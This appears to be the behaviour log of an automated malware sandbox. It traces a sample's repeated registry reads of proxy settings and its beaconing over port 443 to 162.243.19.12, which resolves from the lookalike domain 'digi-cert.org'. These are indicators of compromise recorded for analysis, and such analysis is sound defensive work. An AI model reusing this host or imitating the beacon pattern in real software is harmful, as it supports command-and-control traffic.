Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 61, size_out = 61	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1575, size_out = 1575	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 331, size_out = 331	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 4, size_out = 4	1	Fn Data
Socket	Send	flags = NO_FLAG_SET, size = 134, size_out = 134	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 218, size_out = 218	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 213, size_out = 213	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 272, size_out = 272	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1248, size_out = 1248	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 213, size_out = 213	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
DNS	Resolve Name	host = digi-cert.org, address_out = 162.243.19.12	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
DNS	Resolve Name	host = digi-cert.org, address_out = 162.243.19.12	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data

Notifications (1/1)

Monitored Processes

Behavior Information - Sequential View

Before

After